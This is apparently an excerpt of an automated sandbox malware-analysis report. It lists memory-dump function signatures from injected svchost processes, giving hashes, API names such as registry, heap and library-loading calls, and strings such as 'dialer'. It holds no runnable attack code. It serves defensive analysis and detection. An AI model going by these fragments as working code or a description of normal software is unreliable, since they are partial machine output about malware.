                                                                                • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction ID: fc48c038c58eca095657e722b28af341116bf169d467f81dd0427d00468570f8
                                                                                • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction Fuzzy Hash: 90F090B1351F8681EB208B29E8443F963A1FB89BE1F5456B9CA6A472E4DF3CC048C340
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                • Instruction ID: 695498e749fc0dccb61c5851ea1446fca79afe24a4ea5175a6ebc953a781018c
                                                                                • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                • Instruction Fuzzy Hash: FE02B536259BC586EB60CB65E4943BAB7E1F3C8794F145065FA8E87BA8DB7CC444CB00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                • Instruction ID: af79dd3a637af7051ac8258955ba177530c52f0ebe9781b5e5262fa2f630485f
                                                                                • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                • Instruction Fuzzy Hash: 9B61B736559E86C6E760CB25E4443BAB7E0F388BC4F5421A5FA8E47BA8DB7CC540CB00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: a4a41e1020a2a8b071d84c40f44e8a003d1d22f86d765e777ed5b7e6a37d2a97
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 101191B2AD0F1391FA641528E4C13F91BC16F593F4FC88639E966C73D68BB4C841C200
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 18dd3864b1be54540109cc27050939df0162b2e3d2136eb0ccd191d63ff6d6f5
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 4B117032AD0ED3A2F6685568E8563F911C16B7C3F8F18C6F4E976077E6CB38CA416201
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1452528299-0
                                                                                • Opcode ID: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
                                                                                • Instruction ID: 7bb4e64f612b34c83592e40eb8d5e89f9ecd63dea6d765824e11e06b7d663cc9
                                                                                • Opcode Fuzzy Hash: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
                                                                                • Instruction Fuzzy Hash: 26116030786EC382FF549735A8843F922D5AB487E4F0D66B4D926077D9EB38C841C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: 8ad1ea8264d7c37166e6a84d5d136f736317519dcbce977c15a2e7b39df90729
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: 1B61C1766A0E4242FA699B69E5C43FE6EE1E7867C0F544539DB0B077A4DB34FA42C300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3544855599-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: f049bdfa4467cedf291596ae25218e3f591c75243dbf1769f2e4c86082fcfec4
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: F8614737601A858AEB209FA5D8803FD77E1F344B98F089265EE4A57B99DB38C595C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 25aad5721677bc98cafa89319ea8e24db697cc3f84d272024727a276e12cc536
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: B5515C32180A82CEEB64CB2695843A97FE1F355BD4F18C226DB9987BD5CF38E491C701
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 9177f0bf0d9df7804a9a46984ee0add15a62b848f9b6fecfe92ace9b6ae30fc5
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: 2B518F72140AC28AEB748BB59D843B977E0F354BE5F1CA265DA5947BD5CF38D860CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: afc53225cc655b2fed49d42925427f3b528b099016d9c220d28cc2c64652b1ec
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: 1D51AB32661A02CAFB18DB15E484BB93BE5F354BDCF518134DB1643B88EB78E841CB84
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: 5bb8fd39fd54a1bbbe4b45dd7fca3805f069a24c38516c4c1dc5b630a5076e57
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: C431BC72251B42D6F714DF12E884BA97BE8F740BC8F458124EF9A43B88DB38E941C784
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 2718003287-0
                                                                                • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction ID: c39e5784b660c4a4d2f64d18794380c2bf08d3c743fbeb2aeb89f9dd3d7ee852
                                                                                • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction Fuzzy Hash: E0D19A72B54E818AE711CBA9D4402FC7BF1F358BD8F1482A6DE5997B99DB34C506C340
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction ID: 6a44d1e2dfff894d57fae1d393df2fad9fd7c7e601c52ccba1ddab5a2a16cdc8
                                                                                • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction Fuzzy Hash: 90014476640ED1DAE704EF66E9082AAA7E0F78CFC1F088435EA4A43729EF38C151C740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode
                                                                                • String ID:
                                                                                • API String ID: 953036326-0
                                                                                • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction ID: fc060a2a777751a54c3aac3ae4014f4932e9590c1f0470bfe82fe847ff4173f9
                                                                                • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction Fuzzy Hash: DD91CE72B50ED289FB64DF6594903FD3BE0B745BC8F1481A9DE0AA7A95DB34C482C700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
                                                                                • API String ID: 2933794660-0
                                                                                • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction ID: 96732df7916216e4dd4de8696d19f0f646e57f72df42aa736ed25244752b7042
                                                                                • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction Fuzzy Hash: B0111872790F428AEB008B70E8543B833A4F719798F441E35DA6D477A4EB78D2988380
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction ID: a81e46be2f1358104ca60f674bf27db7b8eb3ba3bc6c3102e371a9ccd66cc1d5
                                                                                • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction Fuzzy Hash: 1B719F36280FC286EB259F36A8483FA67D4F389BC4F582076DD0A53B9ADF35D6458700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: ae7e25292b4b5205da875e4987803c657081cd892f163ddae90b46efd944a166
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: 7E613432A01B868AEB20DF69D4803ED7BA0F748BD8F144225EF4917B99DB78E595C740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction ID: 2488fe1737ff95e66ad044885111441f0c3a749c14707708a82aa8e704c637ae
                                                                                • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction Fuzzy Hash: B551C072284FC381EB649A3AA4583FAA7D1F3857C0F4D61B5DE5903B9ADB39C6058740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction ID: 2514762f6e10ab6845feae25dddec55dde5b08df4a5e13f98591cf2ab0d60153
                                                                                • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction Fuzzy Hash: 60418D72615E8186EB209F25E8443FAB7A0F798BD4F548171EE4E87798EB3CC541CB50
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: a1389ac8532826ac596aaee6b13d59646ba39f355e91e1ec56b6d169f0d5a3fa
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
• Instruction Fuzzy Hash: 61112832214FC182EB618F25E4443A9B7E5FB88B94F598264EE8C07B69DF3CC595CB00

Memory Dump Source
• Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
Similarity
• API ID: __std_exception_copy
• String ID: ierarchy Descriptor'$riptor at (
• API String ID: 592178966-758928094
• Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
• Instruction ID: 09633eca710365df152610dc5942b59f08b7406966c11a0154c1b9ae03bc6ca5
• Instruction Fuzzy Hash: 09E086B1680F4690DF028F62E8802E837E0DB58BA4B489132DA5C47351FB7CD1E9C300

Memory Dump Source
• Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
Similarity
• API ID: __std_exception_copy
• String ID: Locator'$riptor at (
• API String ID: 592178966-4215709766
• Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
• Instruction ID: 6f46bb36e99698124d87c0e4d324587b24abbfd4879edec8008199ce5951e68a
• Instruction Fuzzy Hash: 74E0E6B1651F45D4DF028F61E4901E877A5E758B94B889132DA5C47355EB78D1E5C300

Memory Dump Source
• Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
• Instruction ID: 4d82505500ce06d62ce877f2f89efa63fb9e64a04db03c9d2b6106834071bf2b
• Instruction Fuzzy Hash: 67113A35641F8686EA54DB66A8082B967E1FB89FC0F1890B9DE4D57776EF38C442C300
Memory Dump Source
• Source File: 00000044.00000002.3310341405.000001CA98540000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA98540000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_1ca98540000_svchost.jbxd
Similarity
• API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
• String ID:
• API String ID: 1683269324-0
• Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
• Instruction ID: 02608f7fb42785df329ad58013826795d5046dbf7aea57e8edc5433c45882f35
• Instruction Fuzzy Hash: 021180746D4649C2FB669B39F90BFD923A4AF54B4DFD0412CA946825B1EF79C14CC203
APIs
  • Part of subcall function 000001CA98541628: GetProcessHeap.KERNEL32 ref: 000001CA98541633
  • Part of subcall function 000001CA98541628: HeapAlloc.KERNEL32 ref: 000001CA98541642
  • Part of subcall function 000001CA98541628: RegOpenKeyExW.ADVAPI32 ref: 000001CA985416B2
  • Part of subcall function 000001CA98541628: RegOpenKeyExW.ADVAPI32 ref: 000001CA985416DF
  • Part of subcall function 000001CA98541628: RegCloseKey.ADVAPI32 ref: 000001CA985416F9
  • Part of subcall function 000001CA98541628: RegOpenKeyExW.ADVAPI32 ref: 000001CA98541719
  • Part of subcall function 000001CA98541628: RegCloseKey.ADVAPI32 ref: 000001CA98541734
  • Part of subcall function 000001CA98541628: RegOpenKeyExW.ADVAPI32 ref: 000001CA98541754
  • Part of subcall function 000001CA98541628: RegCloseKey.ADVAPI32 ref: 000001CA9854176F
  • Part of subcall function 000001CA98541628: RegOpenKeyExW.ADVAPI32 ref: 000001CA9854178F
  • Part of subcall function 000001CA98541628: RegCloseKey.ADVAPI32 ref: 000001CA985417AA
  • Part of subcall function 000001CA98541628: RegOpenKeyExW.ADVAPI32 ref: 000001CA985417CA
• Sleep.KERNEL32 ref: 000001CA98541AD7
• SleepEx.KERNELBASE ref: 000001CA98541ADD
  • Part of subcall function 000001CA98541628: RegCloseKey.ADVAPI32 ref: 000001CA985417E5
  • Part of subcall function 000001CA98541628: RegOpenKeyExW.ADVAPI32 ref: 000001CA98541805
  • Part of subcall function 000001CA98541628: RegCloseKey.ADVAPI32 ref: 000001CA98541820
  • Part of subcall function 000001CA98541628: RegOpenKeyExW.ADVAPI32 ref: 000001CA98541840
  • Part of subcall function 000001CA98541628: RegCloseKey.ADVAPI32 ref: 000001CA9854185B
  • Part of subcall function 000001CA98541628: RegOpenKeyExW.ADVAPI32 ref: 000001CA9854187B
  • Part of subcall function 000001CA98541628: RegCloseKey.ADVAPI32 ref: 000001CA98541896
  • Part of subcall function 000001CA98541628: RegCloseKey.ADVAPI32 ref: 000001CA985418A0
Memory Dump Source
• Source File: 00000044.00000002.3310341405.000001CA98540000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA98540000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_1ca98540000_svchost.jbxd
Similarity
• API ID: CloseOpen$HeapSleep$AllocProcess
• String ID:
• API String ID: 1534210851-0
• Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
• Instruction ID: e5877da068afd20c9cddd86298f94b34e7c121e501fc79df45c04bcb12845f54
• Instruction Fuzzy Hash: 7B313E312D8649D1FF569B3ADA43BE923A8AF44FCCF8454218E0AC7695FE30C85DC212
Memory Dump Source
• Source File: 00000044.00000002.3310341405.000001CA98540000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA98540000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_1ca98540000_svchost.jbxd
Similarity
• API ID:
• String ID: dialer
• API String ID: 0-3528709123
• Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
• Instruction ID: 860d2abcd78385b5b6352b5b090ca42a6c42d302506dbb19178a9b524337b78a
• Instruction Fuzzy Hash: B4D05E753D2249C6FB569FAA88C6EE06350EF04B4CFC84034890002160DB39C98D9611
Memory Dump Source
• Source File: 00000044.00000002.3310062832.000001CA97FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA97FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_1ca97fd0000_svchost.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
• Instruction ID: 819f76d9a5abc91c6e6eb48c3cbc51dee46eba0d1364d2a0c9ae9ef2f7337be7
• Instruction Fuzzy Hash: B2614632B4129887EF15CF14C041BAD7BD2FB54B9CF988121CE1AA3788DB34D852D7A2

Memory Dump Source
• Source File: 00000044.00000002.3310062832.000001CA97FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA97FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_1ca97fd0000_svchost.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: Tuesday$Wednesday$or copy constructor iterator'
• API String ID: 3215553584-4202648911
• Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
• Instruction ID: 14dcb86dd8f0441671da9dd4c2d17c6507bc951c5010396476c75a52142e6302
• Instruction Fuzzy Hash: 6261C23268024C42FA67DB28E447FEE6EE0AF4175CFD44555CA2BB77A4EB34C841C222

Memory Dump Source
• Source File: 00000044.00000002.3310062832.000001CA97FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA97FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_1ca97fd0000_svchost.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm$f
• API String ID: 3242871069-629598281
• Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
• Instruction ID: d0b14945f8b4c0745365dd35961ac8a30c9a52f82823a91ee70ca9263ca45886
• Instruction Fuzzy Hash: C651DE327412088AFB16CF15E406F993BE5FB50BACF918124DA07A3788EB34DC40C72A

Memory Dump Source
• Source File: 00000044.00000002.3310062832.000001CA97FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA97FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_1ca97fd0000_svchost.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm$f
• API String ID: 3242871069-629598281
• Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
• Instruction ID: bdce6d5c304d3e2db81985148f121619515b534cc9f314feddc33e8dc54f5cfd
• Instruction Fuzzy Hash: BB31AF322416489AF716DF15E846F993BA5FF40B9CF858014EE5BA3784DB38D940C72A

Memory Dump Source
• Source File: 00000044.00000002.3310062832.000001CA97FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA97FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_1ca97fd0000_svchost.jbxd
Similarity
• API ID: CallTranslator
• String ID: MOC$RCC
• API String ID: 3163161869-2084237596
• Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
• Instruction ID: ca70dbbd545fe2c05a366975a8c2cf549e4bf70a6ec871fb258b060c3f0cd3d6
• Instruction Fuzzy Hash: 89616833604A888AFB22DFA5D481BDD7BA0FB48B8CF444215EE4A67B98DB38D455C711

Memory Dump Source
• Source File: 00000044.00000002.3310062832.000001CA97FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA97FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_1ca97fd0000_svchost.jbxd
Similarity
• API ID: __std_exception_copy
• String ID: ierarchy Descriptor'$riptor at (
• API String ID: 592178966-758928094
• Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
• Instruction ID: 130e87942d0e0c6d0456325ff2bc0814ae33aee10acfd8dc0b9fc2b8868df37b
• Instruction Fuzzy Hash: FDE08671690B4990EF038F66E8416D837A0DF98B6CBC89122995D57311FB3CD1E9C311

Memory Dump Source
